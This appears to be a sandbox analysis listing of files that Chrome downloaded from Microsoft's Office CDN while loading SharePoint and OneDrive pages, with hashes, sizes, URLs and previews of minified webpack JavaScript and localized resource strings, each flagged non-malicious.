                              Preview:self._perfMarks = {};.self._markPerfStage=function(key) {if(self.performance && typeof self.performance.now === 'function'){self._perfMarks[key]=self.performance.now();} else{self._perfMarks[key]=Date.now();} if (self.performance && typeof self.performance.mark === 'function') {self.performance.mark(key);}};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsStart'));.self._cdnBaseUrl = 'https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/';.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-12.003/spwebworker.js');.self._wwKillSwitches = {};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsEnd'));.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (3305)
                              Category:downloaded
                              Size (bytes):63083
                              Entropy (8bit):5.686068632896441
                              Encrypted:false
                              SSDEEP:
                              MD5:6D0CD17286A35EED6C8C01B9DA273992
                              SHA1:84991BE965B55088944F3AF5D55D36C416CB0A74
                              SHA-256:151CC4D366A5DC958B2061331BFAD3121E5386E409108C72BB2E72E66C8843FE
                              SHA-512:73CC243318A749C46DD1F56F0FF2EE52D2E9C0092950563BC7D506E608198DA54163C061FB689615C0716D61749F2CC3B1B4ADA27D3A856B51C218DCB7CCFD67
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/ja/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (37736)
                              Category:downloaded
                              Size (bytes):37767
                              Entropy (8bit):5.2596443269905615
                              Encrypted:false
                              SSDEEP:
                              MD5:C9F449269941CD2F0BBF421DF5E43A18
                              SHA1:4FC68E6A7B172FE44CDAEE0E2FF104DDC9C6F3C7
                              SHA-256:31BFB460A141694B85E334A130DCFE70973812DFF58C5767027DE2FFF96573AD
                              SHA-512:D63A6DCE72B06FFC5A27F2DE3EEAC3D70ACDB712C759AFA829418BFAD3DF40B4C2B73D8AC7D55E940CFD8FF0AD1717C075DC779D736174C2A0DFCAD23613E337
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.utilities/odsp.util-67de684a.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.util"],{"odsp.util_578":function(e,t,n){function a(e){var t={};if(e)for(var n=e.split("&"),a=0;a<n.length;a++){var i=n[a].split("=");void 0!==i[1]&&(i[1]=i[1].replace(/\+/g," "),t[i[0]]=decodeURIComponent(i[1]))}return t}function i(e){return e.substring(e.indexOf("?")+1)}function r(e){return e.substring(0,e.indexOf("?"))}function o(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function s(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.d(t,{_S:function(){return qt},g6:function(){return Wt},MC:function(){return He},wH:function(){return He},$6:function(){return Ve},hZ:function(){return Ke},xe:function(){return Ge},bF:function(){return gt},M1:function(){return Te},I7:function(){return Q},bJ:function(){return g},fR:function(){return q},rx:function(){return b},cH:function(){return W},Yv:function(){return h},et:function(){return c},K9:func
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (19138)
                              Category:downloaded
                              Size (bytes):54761
                              Entropy (8bit):5.48231327116434
                              Encrypted:false
                              SSDEEP:
                              MD5:43F21044969F18618C7A50C1196FFBCB
                              SHA1:05B4A8C4E3BEA24A8790D007B3FB28C2393D49A2
                              SHA-256:8D8E910DDCD992155E2846D56F722A5A1D2AEBDF995234E1AA26DE63FC2EDEE4
                              SHA-512:DE821BBEF657981A48DC8F28295ACBB254D3C65D8231A0CCA6331290216B8F5A00870BFF6389B5516529CA1CA982C0BC0196BD5441A2AA3A2028B7C522AAF795
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/62.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[62],{2842:function(e,t,n){function a(e){var t=e.path,n=e.parentLink,a=e.filename,r=e.isContainer,o=e.shouldAllowDisplayFormUrl;if(!n||!a)return t;var s=t,c=i(n),d=r&&a&&t&&(t.indexOf(a)<0||t.indexOf(c)<0)&&-1===t.toLowerCase().indexOf("docsethome.aspx");return(!t||!o&&t.indexOf("/Forms/DispForm.aspx?ID=")>=0||d)&&(s="".concat(c,"/").concat(a)),s}function i(e){return e?e.replace(/\/Forms\/[^\/]*\.aspx$/i,"").replace(/\/[^\/]*\.aspx$/i,""):e}n.d(t,{a:function(){return i},b:function(){return a}})}.,6207:function(e,t,n){n.d(t,{a:function(){return S}});var a=n("tslib_102"),i=n(174),r=n(47),o=n("fui.util_150"),s=n(150),c=n("odsp.util_578"),d=n(790),l=n(1464),u=n(1333),f=n(20),p=n(54),m=n(1227),_=n(14),h=n(48),b={ODB:60222,ODC:null,Fallback:!1},g="88d7a955-6ccc-4b35-b8ff-342a6bb08f3b",v=c.HW.isActivated("6ce35856-96fa-409e-9292-912de2e7e615"),y=c.HW.isActivated("54d52105-eb9a-472b-98c2-17bc1192a994"),S=function(e){f
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2571)
                              Category:downloaded
                              Size (bytes):4589
                              Entropy (8bit):5.371480602162364
                              Encrypted:false
                              SSDEEP:
                              MD5:D520DFF121ADEF58DDD0502D0D0A4B32
                              SHA1:0CF5A1284188282013C9D1AF4143487FC135FFFC
                              SHA-256:432B345C9DCCCC283FE9FA4FA47BC5DD0C7378DA4954C55A08942B0B46BE92FA
                              SHA-512:097BFB1DFB4BEE3723BFD1F7AF98D6845A06711737D1E0552F1291B032F9D24CD576233DACF2481E66352C5C8A95AB136031A4D238870B477B6F107FF5664D4C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/28.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[28],{732:(e,t,n)=>{n.r(t),n.d(t,{computeNewCellRangeDragSelection:()=>c,computeNewItemsDragSelection:()=>d,getAllItemKeysBetween:()=>l,onItemMouseDrag:()=>o,onMouseUp:()=>s});var a=n(20),i=n(317),r=n(3);function o(e,t,n){var a=e.rootRef,r=e.selection,o=e.dragFillSelection,s=e.setDragFillSelection;if(o)if("cellRange"===o.type&&n&&"cellRange"===r.type){var l=c(a.current,r,t,n);(0,i.a)(o,l)||s(l)}else"items"===o.type&&"itemSet"===r.type&&1===r.selectedItemKeys.length&&(l=d(a.current,r.selectedItemKeys[0],t),o.beginItemKey===l.beginItemKey&&o.endItemKey===l.endItemKey||s(l))}function s(e){var t=e.rootRef,n=e.selection,a=e.dragFillSelection,i=e.setDragFillSelection,r=e.onDragFillComplete,o=e.selectCellRange,s=e.addAllToSelection;a&&(r&&r(n,a),"cellRange"===a.type?o(a):s(l(t.current,a.beginItemKey,a.endItemKey)),i(void 0))}function c(e,t,n,o){var s=(0,i.d)(e,t),c=(0,i.c)(e,s),d=c.rowStart,l=c.rowEnd,u=c.colStart,f=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (20454)
                              Category:downloaded
                              Size (bytes):47186
                              Entropy (8bit):5.330509417415011
                              Encrypted:false
                              SSDEEP:
                              MD5:41FA38E68E6428AF4F18B02AAA802F33
                              SHA1:4B88524C34AFC9830E722E7DC86508C5A2064C53
                              SHA-256:D1AADC7101E88746CBE41858CDA4443C88B84EE15A4A82EC530C20FB814F73F8
                              SHA-512:612CE0A4067F16267B8B6756E2C2F7464BFF328DB725B5F50F319B4940E43512EC7DF9CF62601E1B43B9C32A8F72C4CEFEDA469177758A16815BD949206BBB7F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/233.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[233],{4640:function(e,t,n){n.d(t,{a:function(){return a}});var a=new(n("odsp.util_578").qT)("metadataSearchDataSource")}.,2407:function(e,t,n){var a,i=n("odsp.util_578"),r={ODB:563,ODC:null,Fallback:!1};!function(e){"use strict";function t(e){return"url"===e||"website"===e}var n;e.isShortcutItem=function(e){return!(!e||!e.extension)&&t("."!==e.extension[0]?e.extension:e.extension.slice(1))},e.isShortcutFileType=t,e.isShortcutEnabled=function(){return i.IT.isFeatureEnabled(r)},(n=e.ShortcutErrors||(e.ShortcutErrors={}))[n.UnknownError=0]="UnknownError",n[n.NewFileCreationFileAlreadyExistsError=1]="NewFileCreationFileAlreadyExistsError",n[n.InvalidCharacterError=2]="InvalidCharacterError"}(a||(a={})),t.a=a}.,1830:function(e,t,n){n.r(t),n.d(t,{ENGAGEMENT_ROOT:function(){return i.a},EngagementBuilder:function(){return i.b},EngagementHelper:function(){return s},EngagementPart:function(){return i.d},EngagementPartT
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (27248)
                              Category:downloaded
                              Size (bytes):29405
                              Entropy (8bit):4.870332956998356
                              Encrypted:false
                              SSDEEP:
                              MD5:6C28293B5900925BEAF83E7A1555BF8A
                              SHA1:19E6C62E804A885FD36DFB65CC6FD8A7BCE556A3
                              SHA-256:0FA4E6E922D7B7D176770ECB68ED6DBC764C24945D2B80DE5A4D60A847ED8D58
                              SHA-512:FAAEBF42E59E3C1E2A4C042BAB6430E4A0637BADB3DA91D196DB26D7423AFA67587635816E1A7C1A2EC5DF0D712FE934AC0BC92C14B31130A5DDB54B09CDA0A7
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/70044.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[70044],{493955:(e,t,n)=>{n.d(t,{_:()=>f});var a=n(408156),i=n(235094),r=n(336505),o=n(878542),s=n(218777),c=n(550948),d=n(501544);const l=(0,c.s)({root:{Bahqtrf:"fk6fouc",sj55zd:"f19n0e5"},disabled:{sj55zd:"f1s2aq7o",Bbusuzp:"f1dcs8yz"},required:{sj55zd:"f1whyuy6",uwmqm3:["fruq291","f7x41pl"]},small:{Be2twd7:"fy9rknc",Bg96gwp:"fwrc4pm"},medium:{Be2twd7:"fkhj508",Bg96gwp:"f1i3iumi"},large:{Be2twd7:"fod5ikn",Bg96gwp:"faaz57k",Bhrd7zp:"fl43uef"},semibold:{Bhrd7zp:"fl43uef"}},{d:[".fk6fouc{font-family:var(--fontFamilyBase);}",".f19n0e5{color:var(--colorNeutralForeground1);}",".f1s2aq7o{color:var(--colorNeutralForegroundDisabled);}",".f1whyuy6{color:var(--colorPaletteRedForeground3);}",".fruq291{padding-left:var(--spacingHorizontalXS);}",".f7x41pl{padding-right:var(--spacingHorizontalXS);}",".fy9rknc{font-size:var(--fontSizeBase200);}",".fwrc4pm{line-height:var(--lineHeightBase200);}",".fkhj508{f
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8142)
                              Category:downloaded
                              Size (bytes):30010
                              Entropy (8bit):5.213163172684024
                              Encrypted:false
                              SSDEEP:
                              MD5:BE31C5C10B6992D629F381378EEC879B
                              SHA1:C706E590FCD3A2B2B6A40BAB94EC7C4EDC40EE11
                              SHA-256:365AF6EC88A83B65D3020789749BF65B1208C66CB27C8B642C690B75E9C6B268
                              SHA-512:5DDF861A293EFADC79BE391011DD25B1F2FD2B6887D94BAEB51476F0AE3FA59CFB1FB0E4A40230FCB5DDA76792C9D099E1A88C45F9B7BC74B3381E7B2FD4FF60
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/499.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[499],{2674:function(e,t){var n;!function(e){e[e.share=1]="share",e[e.copy=2]="copy",e[e.atMention=3]="atMention",e[e.linkSettings=4]="linkSettings",e[e.manageAccess=5]="manageAccess",e[e.notify=6]="notify",e[e.addPeople=7]="addPeople"}(n||(n={})),t.a=n}.,2313:function(e,t,n){n.d(t,{a:function(){return a}});var a={Owner:0,View:1,Edit:2,Submitter:3,CoOwner:4,None:5,Review:6,Custom:7}}.,2488:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("knockout-lib");function i(e,t){var n=document.createElement("div");n.innerHTML=t,a.applyBindings(e,n);var i=n.textContent;return a.cleanNode(n),i}}.,2171:function(e,t){var n=/[<>&'"\\]/g,a=/(&lt;|&gt;|&amp;|&quot;|&#39;|&#92;)/g,i={"<":"&lt;",">":"&gt;","&":"&amp;",'"':"&quot;","'":"&#39;","\\":"&#92;"},r={"&lt;":"<","&gt;":">","&amp;":"&","&quot;":'"',"&#39;":"'","&#92;":"\\"};function o(e){return i[e]}var s=function(){function e(){}return e.encodeText=function(e){ret
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (11117)
                              Category:downloaded
                              Size (bytes):174651
                              Entropy (8bit):5.44807231401596
                              Encrypted:false
                              SSDEEP:
                              MD5:64C03582E4C2120FCF185E0450B13C16
                              SHA1:E5A186D15598D645A0AFDE1A74D6408897742ED2
                              SHA-256:A712242BF41107C8961E976F6D61E35BA6F759FDDF7F47336558CB40B33F2A4F
                              SHA-512:4C6363B013F641E1A56824285286860B041183AF667A873D329E41B52D2835971789ABDC293B1A67A9C5687E5BC6343190626C0C31428971A0CEC9D4E4D242AB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/plt.listviewdataprefetch.js
                              Preview:var __webpack_result__;!function(){"use strict";var e={515:function(e,t,n){n.r(t),n.d(t,{__assign:function(){return a.W_},__asyncDelegator:function(){return a.nT},__asyncGenerator:function(){return a.Hq},__asyncValues:function(){return a.qA},__await:function(){return a.jr},__awaiter:function(){return a.Zd},__classPrivateFieldGet:function(){return a.nu},__classPrivateFieldSet:function(){return a.Cn},__createBinding:function(){return a.bg},__decorate:function(){return a.uh},__exportStar:function(){return a.m_},__extends:function(){return a.XJ},__generator:function(){return a.qr},__importDefault:function(){return a.D},__importStar:function(){return a.JV},__makeTemplateObject:function(){return a.hY},__metadata:function(){return a.ZX},__param:function(){return a.$T},__read:function(){return a.MS},__rest:function(){return a.l7},__spread:function(){return a.Te},__spreadArray:function(){return a.AE},__spreadArrays:function(){return a.CO},__values:function(){return a.OY}});var a=n("tslib_102")}
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):72
                              Entropy (8bit):4.241202481433726
                              Encrypted:false
                              SSDEEP:
                              MD5:9E576E34B18E986347909C29AE6A82C6
                              SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                              SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                              SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                              Malicious:false
                              Reputation:unknown
                              Preview:{"Message":"The requested resource does not support http method 'GET'."}
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (3127)
                              Category:downloaded
                              Size (bytes):22017
                              Entropy (8bit):5.3934290141380785
                              Encrypted:false
                              SSDEEP:
                              MD5:2AF4116CFFBB4B97A6DF49AA4B73FB98
                              SHA1:DD6C36F9EB41B0E0A143681214A7F8502CB33F03
                              SHA-256:471F31B7F47ED4AF966334B52F9DFA60872A6825E492EE2296778AA0018BFE8C
                              SHA-512:2FE9874F6AF70BB6E6918E004F15C83DDB7821D4DF701CF0BEECDD8AD9913712B60E9F270684B6B7F3ACC8BFD2165BA155205121769F6EDE0A4F508910DD1967
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/45.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[45],{6122:function(e,t,n){n.d(t,{a:function(){return b},b:function(){return h}});var a=n("tslib_102"),i=n("react-lib"),r=n(3),o=n(10),s=n(7),c=n(16),d=n(117),l=n(6123),u=n(8),f=n(1433),p=n(6),m=n(11),_=(0,d.a)()((0,c.a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(6),n.e(3),n.e(20),n.e(9),n.e(31),n.e(11),n.e(33),n.e(22),n.e(35),n.e(74),n.e(75),n.e(76),n.e(395),n.e(417),n.e(967)]).then(n.bind(n,4780))];case 1:return[2,e.sent().InlineFieldEditorRenderer]}})})})),h=function(e,t){var n=t.contentTypeId,a=t.itemKey,i=t.fieldName,r=e.demandItemFacet(u.a,a),o={listKey:{webAbsoluteUrl:r?r.webAbsoluteUrl:"",listFullUrl:r?r.listFullUrl:""},contentTypeId:n||""},s=f.a.serialize(o),c=e.demandItemFacet(p.Cd,s),d=!1;return c&&c.Fields&&i&&(d=c.Fields.split(",").indexOf(i)>-1),d&&(0,l.b)(e,{itemKey:a})},b=(0,r.c)
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (21309)
                              Category:downloaded
                              Size (bytes):61846
                              Entropy (8bit):4.952800321315994
                              Encrypted:false
                              SSDEEP:
                              MD5:A5398AD6FD4F7ECE7D2CD1F4A3E761EB
                              SHA1:9E770A37DB0AEE06EE853C26E06B0AEBE77A11C6
                              SHA-256:0F53BEA53B45FB9A856B7A6D5B7DDE337FD09F4CC6568680BF526F394E7AD038
                              SHA-512:EA2DDB803A9E9344CA588DE860169DCC9F1A5763A8610145D7CFC5103DD4B10A76D7D5FC0979A24BFD2473ED5518D8C9A1E72EDDFB5B13DC91CEDF1D9DE3659C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/es/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":"Se ha producido un error","c":"Pruebe a actualizar la p.gina","b":"Se ha producido un error y no se pudo mostrar la p.gina."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"Abrir en el Lector inmersivo"}')}.,696:e=>{e.exports=JSON.parse('{"b":"A.adir acceso directo a Mis archivos","d":"Agregar acceso directo a OneDrive","n":"Quitar","p":"Quitar el m.todo abreviado de Mis archivos","y":"Quitar de mi lista compartida","a":"Agregar un acceso directo a esta carpeta en Mis archivos","o":"Quitar los accesos directos a esta carpeta de Mis archivos","c":"Agregar acceso directo a esta carpeta en OneDrive","m":"Quitar los accesos directos seleccionados de esta ubicaci.n","f":"Agregar acceso directo a .lbumes","e":"Agregar un acceso directo a este .lbum compartido en .lbumes","k":"Abrir ubicaci.n del archivo","t":"Fecha","s":"Cualquier fecha","u":".ltimas 24 horas
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5969)
                              Category:downloaded
                              Size (bytes):14761
                              Entropy (8bit):5.365903577132704
                              Encrypted:false
                              SSDEEP:
                              MD5:3929B241CFB9AA51CBD412E8F334BBC1
                              SHA1:8F16B6E365565EF3761888E814F638C857FC42F1
                              SHA-256:151901454CC63027D475CFAF33C8562EF87262DB59535E8EF1AB6BC7CB5645C1
                              SHA-512:8612336799488A9920BC0CB7DDDDD200BD8DA7E8F19D5D917289563E59F44C1AF7BC6A9D87BA7C373DF1D4F93B17D5A87353CB3B093CBE80931420724A80C5EB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/20.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[20],{2330:(e,t,n)=>{n.d(t,{a:()=>p,b:()=>_,c:()=>m,d:()=>h});var a,i,r=n("tslib_102");!function(e){e[e.ContextMenu=0]="ContextMenu",e[e.RibbonDocuments=1]="RibbonDocuments",e[e.RibbonList=2]="RibbonList"}(a||(a={})),function(e){e[e.None=0]="None",e[e.List=1]="List",e[e.ContentType=2]="ContentType",e[e.ProgId=3]="ProgId",e[e.FileType=4]="FileType"}(i||(i={}));var o="ClientSideExtension.ListViewCommandSet",s=n(15),c=n(59),d=n(2331),l=n(51),u=n("odsp.util_578"),f=n(78);function p(e){var t=e;return e.RegistrationType&&"string"==typeof e.RegistrationType&&(t.RegistrationType=i[e.RegistrationType]),t}function m(e,t){var n=[],a=[],s=[];if("undefined"==typeof DOMParser)throw new Error("Cannot parse custom actions on this platform");for(var d=new DOMParser,f=function(e){var f=e.Location,p=e.RegistrationType;if(f&&0===f.lastIndexOf(o,0)){if(!p||p!==i.List)return"continue";var m=f===o,_="ClientSideExtension.ListViewComm
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1381)
                              Category:downloaded
                              Size (bytes):1386
                              Entropy (8bit):5.28009220096632
                              Encrypted:false
                              SSDEEP:
                              MD5:8DECD52EBC4AE2DB17BF4CAEECE59C6E
                              SHA1:1907A7504D20F33ABF790B6C2FC16B47E0096008
                              SHA-256:56B4452701C2CD376B0B1F8022A710D5DC0555A48CB03F719E90B55AA696F627
                              SHA-512:17AA7D398B5D5E79A326144E11C9B42AE8B8D685938471C2E8C32A632C891144DCE6E84E5A555DF655FD1793228F21404F03E1E9383772D1B9B9BEFD45EBDABB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/190.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[190],{1858:(e,t,n)=>{n.r(t),n.d(t,{HighlightElement:()=>o});var a=n("react-lib"),i=n("react-dom-lib"),r=n(256);(0,n("fui.util_150").pZ)([{rawString:".root_d91d24a1{border:2px solid var(--ms-palette-themePrimary);border-radius:var(--ms-effects-roundedCorner4);z-index:99;filter:drop-shadow(0px 0px 7px #87447d);transition:opacity .5s linear;opacity:0;pointer-events:none;box-sizing:border-box}.root_d91d24a1.highlightElementVisible_d91d24a1{opacity:1}"}]);var o=function(e){var t=a.useState(),n=t[0],o=t[1],s=e.currentElement,c=e.appRoot,d=e.isVisible,l=a.useRef();a.useEffect(function(){return(n&&!(null==c?void 0:c.contains(n))||void 0===n)&&(l.current=r.a.waitForElement('[data-automationid="list-content"]',function(e){return o(e)})),function(){l.current&&l.current.disconnect()}},[c,n]);var u=["root_d91d24a1"];d&&u.push("highlightElementVisible_d91d24a1");var f=a.createElement("div",{className:u.join(" "),style:func
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1075)
                              Category:downloaded
                              Size (bytes):2432
                              Entropy (8bit):5.308622590525204
                              Encrypted:false
                              SSDEEP:
                              MD5:4402C94CA852B6F8CB1421F98448BE05
                              SHA1:F90C2A473A95F242C624F2C7E858C294A325A35A
                              SHA-256:49B3F97881027007E2ED02F331262DCF4C2F241EE618BAB1B2E9637EADED423B
                              SHA-512:40DC1662270F90C104C88C5B63AA8B39D3C19140FD442F9DCA14C33CE883F037BCBACE40E2EA4FFD4F49ECEBDF435F74F081EF69417C39CBCA30D7C41A6FBE39
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/55.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[55],{1131:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"ItemLikeRatingDataSource.key",loader:new a.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e(195)]).then(n.bind(n,1509)).then(function(e){return e.resourceKey})})})}.,1601:(e,t,n)=>{n.d(t,{a:()=>d});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(1131),o=n(4),s=n(17),c=n(2),d=new i.qT({name:"likeCommand",factory:{dependencies:{pageContext:o.a,getDataSource:r.a.async.lazy,listItemStore:s.a},create:function(e){var t=e.pageContext,n=e.getDataSource,i=e.listItemStore;return{instance:function(e,r,o){return(0,a.Zd)(this,void 0,void 0,function(){var s,d,l,u,f,p,m,_;return(0,a.qr)(this,function(h){switch(h.label){case 0:return[4,n()];case 1:return s=h.sent(),(0,c.ob)()?[3,3]:[4,s.setLike(e,t.listId,r)];case 2:return h.sent(),[3,4];case 3:s.setLike(e,t.listId,r),h.label=4;case
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1095)
                              Category:downloaded
                              Size (bytes):1100
                              Entropy (8bit):5.224766268999136
                              Encrypted:false
                              SSDEEP:
                              MD5:E2EACC178ACA38D73D0CAEF748356BD3
                              SHA1:97E16470668AED53A93F230B8DC605E81750BD0F
                              SHA-256:0996122EFF3E8F41E2997B83B1F64F59DAF05E23E1EDA64F01DBF8D6B10C63E6
                              SHA-512:B0BBC4C22D6C6FC2C4AE0915EC2F326AFB4C7FE168B98455522104F96D7A1D1963547217153A0922771CEFE318DC1B64046715884D09D7611B86110700D14DB3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/195.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[195],{1509:(e,t,n)=>{n.r(t),n.d(t,{ItemLikeRatingDataSource:()=>c,resourceKey:()=>d});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(4),o=n(476),s=n(2063),c=function(e){function t(t,n){return e.call(this,{dataSourceName:"ItemRatingDataSource"},n)||this}return(0,a.XJ)(t,e),t.prototype.setRating=function(e,t,n){var a=this._pageContext.webAbsoluteUrl,i={listID:t,itemID:e,rating:n},r=new s.b({webAbsoluteUrl:a}).build().methodWithAliases("Microsoft.Office.Server.ReputationModel.Reputation.SetRating",i).toString();return this.dataRequestor.getData({url:r,qosName:"SetRating",additionalPostData:"{}",method:"POST"})},t.prototype.setLike=function(e,t,n){var a=this._pageContext.webAbsoluteUrl,i={listID:t,itemID:e,like:n},r=new s.b({webAbsoluteUrl:a}).build().methodWithAliases("Microsoft.Office.Server.ReputationModel.Reputation.SetLike",i).toString();return this.dataRequestor.getData({url:r,qosName:"SetLike",additionalPos
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4042)
                              Category:downloaded
                              Size (bytes):7142
                              Entropy (8bit):5.286472083199642
                              Encrypted:false
                              SSDEEP:
                              MD5:E38E77A09673DEFDC557E9B057380B9C
                              SHA1:9D34F28D9E75633E43511CD58ADA3036067579F1
                              SHA-256:BD7B145900845975A76F586F1B535EE17B276724A1810AAEEDCA4022439AA848
                              SHA-512:AE4200ED07E799EB01BAC14A8D64578D1B9E5E9D27D6F80F8E8487B82F2D13C83ACB690BF34AEFE3FD1666BE8773B09BC2797967438A500F4D9877C7463B857B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/59.js
